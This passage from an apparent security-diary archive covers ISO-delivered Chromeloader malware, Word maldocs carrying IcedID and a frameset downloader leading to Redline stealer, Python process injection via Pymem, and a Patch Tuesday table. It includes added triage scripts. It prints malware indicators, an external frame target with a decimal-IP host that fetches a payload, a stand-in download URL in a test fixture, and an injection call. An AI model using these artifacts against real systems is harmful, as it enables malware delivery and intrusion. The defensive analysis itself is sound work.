This is an extremely useful tool when you need a fast way to hunt in Windows event logs with all the benefits of Sigma and speed. I really enjoyed the opportunity to experiment with Chainsaw, appreciate the project leads for their work, as well as the excellent dependencies Chainsaw takes in Sigma, the EVTX parser, and the TAU Engine. Great stuff all around. In the name of my favorite deathcore band, Whitechapel, “the saw is the law”!

Cheers…until next time.

Russ McRee | @holisticinfosec

 

References: Countercept, (2022, August). Rapidly Search and Hunt through Windows Event Logs. Github. Retrieved September 15, 2022, from https://github.com/WithSecureLabs/chainsaw

Roth, F. (2022, June 20). NextronSystems/APTSimulator: A toolset to make a system look as if it was the victim of an apt attack. GitHub. Retrieved September 18, 2022, from https://github.com/NextronSystems/APTSimulator


Published: 2022-09-18

Preventing ISO Malware

In the last few weeks, I’ve seen a significant uptick in systems infected with Chromeloader malware. This malware is a malicious extension for your browser, redirecting it to ad sites and hijacking searches. But with the success of this technique recently, I would not be surprised if others will take notice and switch to using it for other things. 

  

Initial infection

The user landed on malicious search results where the query they searched for was presented as an ISO file matching their search terms. Below are the artifacts from a user that got infected:

https://alizebruisiacult[.]xyz/?cms=Mzg1ODEEDwwMCAYNDQwCAQsCDNDEDgcCDwwPAQAASQ%3D%3D&fn=Stroud%20-%20Advanced%20Engineering%20Mathematics%204e&extt=xpectthatmy.shop%2F%3Ftid%3D952736

C:\Users\user\Downloads\Stroud - Advanced Engineering Mathematics 4e.iso

This ISO file contained the following files:

files.zip
res.ico
Install.lnk
properties.bat

The user double-clicked the properties.bat file, which started the infection process. The ISO was mounted as drive D:, and the batch file used tar.exe (bsdtar, shipped with Windows 10 since version 1803, so a built-in LOLBin) to unpack files.zip into the roaming profile:

Parent Process Name: cmd.exe
Parent Process Command Line: cmd.exe /c ""D:\properties.bat" "
Process Name: tar.exe
Process Command Line arguments: tar -xvf "files.zip" -C "C:\Users\user\AppData\Roaming"

They established persistence with a CurrentVersion\Run key. The recorded value and the binary it points to:

"opensubtitles-uploader.exe "k2eN"" /f
HKEY_CURRENT_USER\S-1-5-21-740110469-27406-3214746-20027\SOFTWARE\Microsoft\Windows\CurrentVersion\
C:\Users\user\AppData\Roaming\opensubtitles-uploader\opensubtitles-uploader.exe

Connections to malicious domains were then made by opensubtitles-uploader.exe:

https://alizebruisiacult[.]xyz
https://raw.githubusercontent[.]com
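The safest way to look at such a lure without ever mounting it is to parse the ISO 9660 directory yourself. The following is an added example (mine, not from the diary or from Mubix's post): it reads the primary volume descriptor and the root directory and flags script, shortcut and hidden entries. build_lure_iso() constructs a tiny image mirroring the file list above so the parser can be exercised offline; the file contents in it are placeholders. The parser handles only the root directory and plain ISO 9660 names, not Joliet or Rock Ridge extensions, which is enough for the flat lure ISOs in this campaign.

```python
SECTOR = 2048
SUSPICIOUS_EXT = {".lnk", ".bat", ".cmd", ".exe", ".dll", ".vbs", ".js", ".hta", ".ps1"}


def _le32(buf, off):
    return int.from_bytes(buf[off:off + 4], "little")


def list_iso_root(image: bytes):
    """Walk the ISO 9660 root directory: name (without ';1'), size, is_dir, hidden."""
    pvd = image[16 * SECTOR:17 * SECTOR]          # primary volume descriptor is at LBA 16
    if pvd[0] != 1 or pvd[1:6] != b"CD001":
        raise ValueError("not an ISO 9660 image")
    root = pvd[156:190]                           # root directory record embedded in the PVD
    dir_start = _le32(root, 2) * SECTOR
    dir_data = image[dir_start:dir_start + _le32(root, 10)]
    entries, off = [], 0
    while off < len(dir_data):
        rec_len = dir_data[off]
        if rec_len == 0:                          # records never span sectors: skip padding
            off = (off // SECTOR + 1) * SECTOR
            continue
        rec = dir_data[off:off + rec_len]
        off += rec_len
        ident = rec[33:33 + rec[32]]
        if ident in (b"\x00", b"\x01"):           # "." and ".." entries
            continue
        flags = rec[25]
        entries.append({"name": ident.decode("ascii").split(";")[0],
                        "size": _le32(rec, 10),
                        "is_dir": bool(flags & 0x02),
                        "hidden": bool(flags & 0x01)})
    return entries


def triage_iso(image: bytes):
    """Flag entries nobody expects in a 'textbook' ISO: executable types and hidden files."""
    findings = []
    for e in list_iso_root(image):
        reasons = []
        ext = ("." + e["name"].rsplit(".", 1)[-1].lower()) if "." in e["name"] else ""
        if ext in SUSPICIOUS_EXT:
            reasons.append("executable-type")
        if e["hidden"]:
            reasons.append("hidden")
        if reasons:
            findings.append((e["name"], reasons))
    return findings


def _dir_record(ident: bytes, extent: int, size: int, flags: int) -> bytes:
    rec = bytearray(33)
    rec[2:6], rec[6:10] = extent.to_bytes(4, "little"), extent.to_bytes(4, "big")
    rec[10:14], rec[14:18] = size.to_bytes(4, "little"), size.to_bytes(4, "big")
    rec[25] = flags
    rec[28:30], rec[30:32] = (1).to_bytes(2, "little"), (1).to_bytes(2, "big")
    rec[32] = len(ident)
    rec += ident
    if len(rec) % 2:
        rec += b"\x00"                            # identifier padding byte
    rec[0] = len(rec)
    return bytes(rec)


def build_lure_iso(files: dict) -> bytes:
    """Constructed minimal ISO 9660 image: {name: (content, hidden)} in the root directory."""
    root_lba, data_lba = 18, 19
    records = _dir_record(b"\x00", root_lba, SECTOR, 2) + _dir_record(b"\x01", root_lba, SECTOR, 2)
    payload = b""
    for name, (content, hidden) in files.items():
        records += _dir_record(name.upper().encode() + b";1", data_lba, len(content), 1 if hidden else 0)
        padded = content.ljust(-(-len(content) // SECTOR) * SECTOR, b"\x00")
        payload += padded
        data_lba += len(padded) // SECTOR
    pvd = bytearray(SECTOR)
    pvd[0], pvd[1:6], pvd[6] = 1, b"CD001", 1
    pvd[156:190] = _dir_record(b"\x00", root_lba, SECTOR, 2)
    terminator = bytearray(SECTOR)
    terminator[0], terminator[1:6], terminator[6] = 255, b"CD001", 1
    return bytes(16 * SECTOR) + bytes(pvd) + bytes(terminator) + records.ljust(SECTOR, b"\x00") + payload


# Constructed image mirroring the lure's file list; files.zip is marked hidden for the demo
LURE = build_lure_iso({
    "files.zip": (b"PK\x03\x04" + b"\x00" * 30, True),
    "res.ico": (b"\x00\x00\x01\x00", False),
    "Install.lnk": (b"L\x00\x00\x00", False),
    "properties.bat": (b"@echo off\r\ntar -xvf files.zip -C %APPDATA%\r\n", False),
})
```

Run triage_iso(open(path, "rb").read()) on a downloaded image: a "textbook" that ships a .bat, a .lnk and a hidden archive is the pattern seen here, and nothing has been mounted or executed to find that out.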

 

Since the infection starts with a user mounting an ISO and executing files from it, the best way to stop this is to prevent users from mounting ISOs by double-clicking. Users can still burn a CD from within Windows if needed, and power users who need to open ISOs can extract them with a compression utility instead.

 

Mubix (Rob Fuller) wrote a great article on how to disable this (1). Below are two different options to prevent users from double-clicking an ISO file to mount it. The GPO method is a little more complete: the registry tweak only removes the Mount verb from Explorer (double-click and the context menu), while the GPO blocks the virtual DVD-ROM device itself, so mounting from PowerShell with Mount-DiskImage is stopped too; see the article for more details. We have deployed this to end users' desktops in my environment and have had neither issues so far nor new infections via this method.

 

GPO 

Computer config -> Admin Templates -> System -> Device Installation Restrictions ->  

  • Allow administrators to override Device Installation Restrictions Policies (enabled) 
  • Prevent Installation from devices that match any of these device IDs 

 Add this exact ID    

  • SCSI\CdRomMsft____Virtual_DVD-ROM_ 

 

Registry Setting 

  • HKEY_CLASSES_ROOT\Windows.IsoFile\shell\mount 
  • Value “ProgrammaticAccessOnly” as REG_SZ 
     

(1) https://malicious.link/post/2022/blocking-iso-mounting/ 


If you have done this or something similar, let us know. 

--

Tom Webb

@twsecblog


Published: 2022-09-18

Video: Grep & Tail -f With Notepad++

This is a video for diary entry "Quickie: Grep & Tail -f With Notepad++".

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com


Published: 2022-09-17

Video: Analyzing Obfuscated VBS with CyberChef

Here is a video for my diary entry "Analyzing Obfuscated VBS with CyberChef".

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com


Published: 2022-09-16

Word Maldoc With CustomXML and Renamed VBAProject.bin

Friend and colleague 0xThiebaut just gave me a heads up for this interesting sample: 2056b52f8c2f62e222107e6fb6ca82708cdae73a91671d40e61aef8698e3e139

This is what we get with oledump.py:

As there seems to be quite a lot of VBA code, I use plugin plugin_vba_dco to give me a summary:

I notice the CustomXMLParts, and I take a look with zipdump.py (because this is an OOXML file):

Taking a look at the content of customXml/item1.xml:

And I see a MZ header (4d5a), so this must be a PE file. Let's extract it with base64dump.py:

And this is the embedded payload: 766fb7ca50d63897e7bb3a5c9659e2fd (IcedID).

There are more interesting things to notice about this sample. One of them is that the VBA project file (an OLE file) is named FIzzyWAbnj.bin instead of the usual vbaProject.bin; the part is still declared through its content type in [Content_Types].xml, so tools that locate the project by name rather than by content type can miss it.

And some tampering:

There's maybe more to discover, but I'm on holiday :-)

 

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com


Published: 2022-09-15

Malicious Word Document with a Frameset

This is definitely not new, but I had not seen this type of document for a while. I spotted a malicious Word OOXML document (the "new" .docx format) that is a simple downloader. Usually, malicious documents contain an embedded file, a VBA macro, or an exploit for the recent MS-MSDT vulnerability[1]. This time, the document does not contain any malicious code; it just refers to a second stage that is fetched when the document is opened.

OOXML Microsoft documents support HTML-like elements such as... framesets! Think of an iframe in an HTML document; Word has a similar capability to pull content into some places of a document. This feature is hidden by default in Word, but you can enable it and create frames from the UI[2]. Because OOXML documents are ZIP archives, they can also be tweaked by hand to implement a frameset and make it point to an external payload.

The document I spotted uses this technique. It was delivered via a phishing campaign and called "Order Confirmation 22839.docx" (SHA256:2382d4957569aed12896aa8ca2cc9d2698217e53c9ab5d52799e4ea0920aa9b9). In the ZIP archive, let's have a look at the "webSettings.xml" file:

remnux@remnux:/MalwareZoo/20220915$ zipdump.py Order\ Confirmation\ 22839.docx
Index Filename                        Encrypted Timestamp           
    1 [Content_Types].xml                     0 1980-01-01 00:00:00 
    2 _rels/.rels                             0 1980-01-01 00:00:00 
    3 word/_rels/document.xml.rels            0 1980-01-01 00:00:00 
    4 word/document.xml                       0 1980-01-01 00:00:00 
    5 word/theme/theme1.xml                   0 1980-01-01 00:00:00 
    6 word/settings.xml                       0 1980-01-01 00:00:00 
    7 word/fontTable.xml                      0 1980-01-01 00:00:00 
    8 word/_rels/webSettings.xml.rels         0 2022-09-14 11:02:52 
    9 docProps/app.xml                        0 1980-01-01 00:00:00 
   10 word/styles.xml                         0 1980-01-01 00:00:00 
   11 docProps/core.xml                       0 1980-01-01 00:00:00 
   12 word/webSettings.xml                    0 1980-01-01 00:00:00 
remnux@remnux:/MalwareZoo/20220915$ zipdump.py Order\ Confirmation\ 22839.docx -s 12 -d | xmldump.py pretty
<?xml version="1.0" ?>
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
    <w:frameset>
        <w:framesetSplitbar>
            <w:w w:val="60"/>
            <w:color w:val="auto"/>
            <w:noBorder/>
        </w:framesetSplitbar>
        <w:frameset>
            <w:frame>
                <w:name w:val="1"/>
                <w:sourceFileName r:id="rId1"/>
                <w:linkedToFile/>
            </w:frame>
        </w:frameset>
    </w:frameset>
    <w:optimizeForBrowser/>
    <w:allowPNG/>
</w:webSettings>

We have indeed a frame whose source is referenced by the id 'rId1'. Relationship ids are resolved in the ".rels" files, here word/_rels/webSettings.xml.rels. Note in the listing above that this is the only part of the archive with a real timestamp (2022-09-14) while everything else is dated 1980-01-01, a hint that it was edited after the document was generated:

remnux@remnux:/MalwareZoo/20220915$ zipdump.py Order\ Confirmation\ 22839.docx -s 8 -d|xmldump.py pretty
<?xml version="1.0" ?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
    <Relationship Id="rId1" Target="http://1806445755/...--------------.....----------------............----------------/....92.doc" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame"/>
</Relationships>

The host part of the target, 1806445755, is an IPv4 address written as a single decimal number (107.172.44.187, the same server that delivers the final payload below), a notation URL parsers accept and that defeats naive IP regexes. Note that the payload is downloaded without the user having to do anything beyond opening the document; all they see is a popup:

The payload ("92.doc") is a classic malicious RTF document (SHA256:dd1a1537774ef9680ff376a4baed81c90b11a521ef4c69ffd23edfa59eaa1300). It downloads the real malware from the following URL:

hxxp://107[.]172[.]44[.]187/92/vbc.exe

The malware is a Redline stealer[3] (SHA256:7d2b174c017d61fcd94673c55f730821fbc30d7cf03fb493563a122d73466aab) talking to the following C2 server:

171[.]22[.]30[.]129:54686
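Both this document and the CustomXML sample from the previous diary ("Word Maldoc With CustomXML and Renamed VBAProject.bin") can be triaged with one pass over the ZIP container. The scanner below is an added example (mine, not oledump/zipdump and not code from the samples): it resolves each part's content type from [Content_Types].xml so a VBA project is found whatever its file name, looks for Base64 runs in customXml parts that decode to an MZ header, and reports every relation with TargetMode="External", tagging frame relations separately. build_sample_docx() constructs a minimal package carrying all three artifacts; the renamed part name FIzzyWAbnj.bin and the frame relation are taken from the two diaries, the fake PE bytes and the 198.51.100.7 target are constructed.

```python
import base64
import binascii
import io
import re
import xml.etree.ElementTree as ET
import zipfile

CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
FRAME_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame"
VBA_CT = "application/vnd.ms-office.vbaProject"
B64_RE = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def _content_types(z):
    """Map extension defaults and per-part overrides from [Content_Types].xml."""
    defaults, overrides = {}, {}
    if "[Content_Types].xml" in z.namelist():
        root = ET.fromstring(z.read("[Content_Types].xml"))
        for el in root.iter(CT_NS + "Default"):
            defaults[el.get("Extension").lower()] = el.get("ContentType")
        for el in root.iter(CT_NS + "Override"):
            overrides[el.get("PartName")] = el.get("ContentType")
    return defaults, overrides


def scan_ooxml(data: bytes):
    """Return (kind, part, detail) findings: VBA parts, embedded PEs, external targets."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        defaults, overrides = _content_types(z)
        for name in z.namelist():
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            ct = overrides.get("/" + name, defaults.get(ext))
            if ct == VBA_CT:                       # found by content type, not by file name
                kind = "vba-project" if name.lower().endswith("/vbaproject.bin") else "vba-project-renamed"
                findings.append((kind, name, ""))
            if name.startswith("customXml/") and name.endswith(".xml"):
                for m in B64_RE.finditer(z.read(name)):
                    chunk = m.group(0)[: len(m.group(0)) // 4 * 4]
                    try:
                        blob = base64.b64decode(chunk)
                    except binascii.Error:
                        continue
                    if blob.startswith(b"MZ"):
                        findings.append(("embedded-pe", name, f"{len(blob)} bytes"))
            if name.endswith(".rels"):
                for rel in ET.fromstring(z.read(name)).iter(REL_NS + "Relationship"):
                    if rel.get("TargetMode") == "External":
                        kind = "external-frame" if rel.get("Type") == FRAME_REL else "external-target"
                        findings.append((kind, name, rel.get("Target")))
    return findings


def build_sample_docx() -> bytes:
    """Constructed minimal OOXML package combining the artifacts of both diaries."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>'
        "</Types>")
    fake_pe = base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00").decode()
    item1 = f'<?xml version="1.0"?><root><data>{fake_pe}</data></root>'
    web_rels = (
        '<?xml version="1.0"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Target="http://198.51.100.7/92.doc" TargetMode="External" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame"/>'
        "</Relationships>")
    doc_rels = (
        '<?xml version="1.0"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Target="styles.xml" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"/>'
        "</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/FIzzyWAbnj.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1")  # OLE magic only
        z.writestr("customXml/item1.xml", item1)
        z.writestr("word/_rels/webSettings.xml.rels", web_rels)
        z.writestr("word/_rels/document.xml.rels", doc_rels)
    return buf.getvalue()
```

On a real file, scan_ooxml(open(path, "rb").read()) gives the three indicators to pivot on: a VBA part under an unexpected name, a PE hidden in customXml, and an external frame target whose host may be written in decimal as above.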

[1] https://isc.sans.edu/diary/New+Microsoft+Office+Attack+Vector+via+%22ms-msdt%22+Protocol+Scheme+%28CVE-2022-30190%29/28694
[2] https://www.extendoffice.com/documents/word/733-word-insert-frame.html
[3] https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key


Published: 2022-09-14

Easy Process Injection within Python

Process injection is a common technique used by malware to cover its tracks: what looks more legit than a process called "notepad.exe" or "explorer.exe"? There are multiple ways to perform process injection; one of them is called "Process Hollowing" (MITRE ATT&CK T1055.012)[1]. When I'm teaching FOR610, students are often surprised that it relies on features of the operating system and is therefore not malicious by default: Microsoft offers all the required API calls to perform this, and some legitimate applications, like your antivirus or EDR solution, use many process injection techniques!

I've been keeping an eye on malicious Python scripts for a while and have already discovered many. Python can call any Windows API (through ctypes) and perform process injection using the classic VirtualAlloc(), CreateRemoteThread(), etc. I already mentioned some of them in previous diaries[2].

But Python has a huge ecosystem with plenty of third-party libraries that help to write powerful scripts[3]. I found an interesting small script that uses the Pymem library[4]. On the website, it is described as:

A python library to manipulate Windows processes (32 and 64 bits). With PyMem you can hack into windows processes and manipulate memory (read/write).

The script was found on VT and has a score of 21/60[5] (SHA256:0cba55d0ec134624c15489a6605231fa1176536dd2cbb3ef1df69fc6b0dca13d). It uses the Pymem library to inject a payload into another process:

Looking deeper, the shellcode turned out to be a PoC: it implements a reverse shell connecting back to an RFC 1918 address on port 4444. This seems to be a red team exercise in preparation!

However, this script demonstrates how easily you can perform process injection from Python! Even more interesting: you don't need the skills to generate real shellcode. Pymem can inject a Python interpreter into the target process and then run arbitrary Python code there, starting with:

pm.inject_python_interpreter()
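Both this sample and the sandbox-evading script from the "Easy Python Sandbox Detection" diary at the top of this page are easy to spot statically once you know which imports and attribute names to look for. Here is an added example (mine, not code from either sample) that parses a script with Python's ast module and tags it; the two sample sources are constructed reproductions of the snippets shown in those diaries, and the indicator lists are a starting point rather than a complete catalogue.

```python
import ast

# Indicators: module names and attribute/function names, grouped by what they suggest
INDICATORS = {
    "sandbox-evasion": {
        "modules": {"sandboxed"},
        "names": {"is_sandboxed"},
    },
    "process-injection": {
        "modules": {"pymem"},
        "names": {"inject_python_interpreter", "inject_python_shellcode", "start_thread",
                  "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
                  "NtCreateThreadEx"},
    },
}


def triage_python_source(src: str) -> dict:
    """Map indicator tag -> set of matched modules/names found in the script."""
    tree = ast.parse(src)
    modules, names = set(), set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            modules.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            modules.add(node.module.split(".")[0])
            names.update(alias.name for alias in node.names)   # "from x import y" exposes y
        elif isinstance(node, ast.Attribute):
            names.add(node.attr)                               # pm.inject_python_interpreter
        elif isinstance(node, ast.Name):
            names.add(node.id)                                 # bare function calls
    hits = {}
    for tag, ind in INDICATORS.items():
        found = (modules & ind["modules"]) | (names & ind["names"])
        if found:
            hits[tag] = found
    return hits


# Constructed reproduction of the sandbox-check prologue from the first diary on this page
SANDBOX_SAMPLE = """
from sandboxed import is_sandboxed
import sys
certainty = is_sandboxed(logging=False)
if int(certainty) > 0.5:
    sys.exit()
import zlib, base64, ssl, socket, struct, time
"""

# Constructed stand-in for the injection script: the real sample's shellcode is not reproduced
INJECT_SAMPLE = """
import pymem
pm = pymem.Pymem("notepad.exe")
pm.inject_python_interpreter()
"""
```

Because the walk is over the AST, the check survives cosmetic renaming of variables but not string-built imports (importlib.import_module("pymem")) or exec() of decoded blobs; those need dynamic analysis, which is exactly what the first sample's sandbox check tries to escape.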

Stay safe!

[1] https://attack.mitre.org/techniques/T1055/012/
[2] https://isc.sans.edu/diary/Python+Shellcode+Injection+From+JSON+Data/28118
[3] https://isc.sans.edu/diary/Keeping+an+Eye+on+Dangerous+Python+Modules/27514
[4] https://pypi.org/project/Pymem/
[5] https://www.virustotal.com/gui/file/0cba55d0ec134624c15489a6605231fa1176536dd2cbb3ef1df69fc6b0dca13d/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key


Published: 2022-09-13

Microsoft September 2022 Patch Tuesday

This month we got patches for 79 vulnerabilities. Of these, 5 are critical, 2 were previously disclosed, and 1 is already being exploited, according to Microsoft.

The exploited vulnerability is an elevation of privilege in the Windows Common Log File System (CLFS) driver (CVE-2022-37969). According to the advisory, an attacker who successfully exploits this vulnerability could gain SYSTEM privileges. The attack vector is local and requires no user interaction, so the attacker must already be able to run code on the target. The CVSS score for this vulnerability is 7.8.

Amongst the critical vulnerabilities, there is a Remote Code Execution (RCE) affecting Windows Internet Key Exchange (IKE) Protocol Extensions (CVE-2022-34721). An unauthenticated attacker could send a specially crafted IP packet to a target machine that is running Windows and has IPSec enabled, and achieve remote code execution. Although the flaw lies in the IKEv1 code, all Windows Server versions are affected because both IKEv1 and IKEv2 packets are accepted. The attack vector is 'network', no user interaction or privileges are required, and the attack complexity is low. This vulnerability has the characteristics of a wormable bug, so give it attention and apply the patch as soon as possible. The CVSS score for this vulnerability is 9.8.

Another critical vulnerability is an RCE affecting Windows TCP/IP (CVE-2022-34718). An unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node on which IPSec is enabled and achieve remote code execution on that machine; systems without the IPSec service running are not vulnerable. Like the previous one, this vulnerability has the characteristics of a wormable bug. Its CVSS score is 9.8 as well.

See my dashboard for a more detailed breakout: https://patchtuesdaydashboard.com/

September 2022 Security Updates

Description
  CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG)
.NET Core and Visual Studio Denial of Service Vulnerability
  CVE-2022-38013 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
.NET Framework Remote Code Execution Vulnerability
  CVE-2022-26929 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
AV1 Video Extension Remote Code Execution Vulnerability
  CVE-2022-38019 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Arm: CVE-2022-23960 Cache Speculation Restriction Vulnerability
  CVE-2022-23960 | Yes | No | Less Likely | Less Likely | Important | - | -
Azure Guest Configuration and Azure Arc-enabled servers Elevation of Privilege Vulnerability
  CVE-2022-38007 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Chromium: CVE-2022-3038 Use after free in Network Service
  CVE-2022-3038 | No | No | - | - | - | - | -
Chromium: CVE-2022-3039 Use after free in WebSQL
  CVE-2022-3039 | No | No | - | - | - | - | -
Chromium: CVE-2022-3040 Use after free in Layout
  CVE-2022-3040 | No | No | - | - | - | - | -
Chromium: CVE-2022-3041 Use after free in WebSQL
  CVE-2022-3041 | No | No | - | - | - | - | -
Chromium: CVE-2022-3044 Inappropriate implementation in Site Isolation
  CVE-2022-3044 | No | No | - | - | - | - | -
Chromium: CVE-2022-3045 Insufficient validation of untrusted input in V8
  CVE-2022-3045 | No | No | - | - | - | - | -
Chromium: CVE-2022-3046 Use after free in Browser Tag
  CVE-2022-3046 | No | No | - | - | - | - | -
Chromium: CVE-2022-3047 Insufficient policy enforcement in Extensions API
  CVE-2022-3047 | No | No | - | - | - | - | -
Chromium: CVE-2022-3053 Inappropriate implementation in Pointer Lock
  CVE-2022-3053 | No | No | - | - | - | - | -
Chromium: CVE-2022-3054 Insufficient policy enforcement in DevTools
  CVE-2022-3054 | No | No | - | - | - | - | -
Chromium: CVE-2022-3055 Use after free in Passwords
  CVE-2022-3055 | No | No | - | - | - | - | -
Chromium: CVE-2022-3056 Insufficient policy enforcement in Content Security Policy
  CVE-2022-3056 | No | No | - | - | - | - | -
Chromium: CVE-2022-3057 Inappropriate implementation in iframe Sandbox
  CVE-2022-3057 | No | No | - | - | - | - | -
Chromium: CVE-2022-3058 Use after free in Sign-In Flow
  CVE-2022-3058 | No | No | - | - | - | - | -
Chromium: CVE-2022-3075 Insufficient data validation in Mojo
  CVE-2022-3075 | No | No | - | - | - | - | -
DirectX Graphics Kernel Elevation of Privilege Vulnerability
  CVE-2022-37954 | No | No | More Likely | More Likely | Important | 7.8 | 6.8
HTTP V3 Denial of Service Vulnerability
  CVE-2022-35838 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
Microsoft Defender for Endpoint for Mac Elevation of Privilege Vulnerability
  CVE-2022-35828 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft Dynamics CRM (on-premises) Remote Code Execution Vulnerability
  CVE-2022-35805 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.7
  CVE-2022-34700 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.7
Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability
  CVE-2022-38012 | No | No | Less Likely | Less Likely | Low | 7.7 | 6.7
Microsoft ODBC Driver Remote Code Execution Vulnerability
  CVE-2022-34726 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
  CVE-2022-34727 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
  CVE-2022-34730 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
  CVE-2022-34732 | No | No | Unlikely | Unlikely | Important | 8.8 | 7.7
  CVE-2022-34734 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
Microsoft OLE DB Provider for SQL Server Remote Code Execution Vulnerability
  CVE-2022-35834 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
  CVE-2022-35835 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
  CVE-2022-35836 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
  CVE-2022-35840 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
  CVE-2022-34731 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
  CVE-2022-34733 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
Microsoft Office Visio Remote Code Execution Vulnerability
  CVE-2022-38010 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
  CVE-2022-37963 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft PowerPoint Remote Code Execution Vulnerability
  CVE-2022-37962 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft SharePoint Remote Code Execution Vulnerability
  CVE-2022-35823 | No | No | Unlikely | Unlikely | Important | 8.1 | 7.1
Microsoft SharePoint Server Remote Code Execution Vulnerability
  CVE-2022-38008 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
  CVE-2022-38009 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
  CVE-2022-37961 | No | No | Unlikely | Unlikely | Important | 8.8 | 7.7
Network Device Enrollment Service (NDES) Security Feature Bypass Vulnerability
  CVE-2022-37959 | No | No | Less Likely | Less Likely | Important | 6.5 | 5.7
Raw Image Extension Remote Code Execution Vulnerability
  CVE-2022-38011 | No | No | Less Likely | Less Likely | Important | 7.3 | 6.4
Remote Procedure Call Runtime Remote Code Execution Vulnerability
  CVE-2022-35830 | No | No | Less Likely | Less Likely | Important | 8.1 | 7.1
SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Information Disclosure Vulnerability
  CVE-2022-37958 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
Visual Studio Code Elevation of Privilege Vulnerability
  CVE-2022-38020 | No | No | Less Likely | Less Likely | Important | 7.3 | 6.4
Windows ALPC Elevation of Privilege Vulnerability
  CVE-2022-34725 | No | No | More Likely | More Likely | Important | 7.0 | 6.1
Windows Common Log File System Driver Elevation of Privilege Vulnerability
  CVE-2022-35803 | No | No | More Likely | More Likely | Important | 7.8 | 6.8
  CVE-2022-37969 | Yes | Yes | Detected | Detected | Important | 7.8 | 6.8
Windows Credential Roaming Service Elevation of Privilege Vulnerability
  CVE-2022-30170 | No | No | Less Likely | Less Likely | Important | 7.3 | 6.4
Windows DNS Server Denial of Service Vulnerability
  CVE-2022-34724 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
Windows DPAPI (Data Protection Application Programming Interface) Information Disclosure Vulnerability
  CVE-2022-34723 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Windows Distributed File System (DFS) Elevation of Privilege Vulnerability
  CVE-2022-34719 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Enterprise App Management Service Remote Code Execution Vulnerability
  CVE-2022-35841 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
Windows Event Tracing Denial of Service Vulnerability
  CVE-2022-35832 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Windows Fax Service Remote Code Execution Vulnerability
  CVE-2022-38004 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows GDI Elevation of Privilege Vulnerability
  CVE-2022-34729 | No | No | More Likely | More Likely | Important | 7.8 | 7.0
Windows Graphics Component Information Disclosure Vulnerability
  CVE-2022-35837 | No | No | Less Likely | Less Likely | Important | 5.0 | 4.4
  CVE-2022-34728 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8
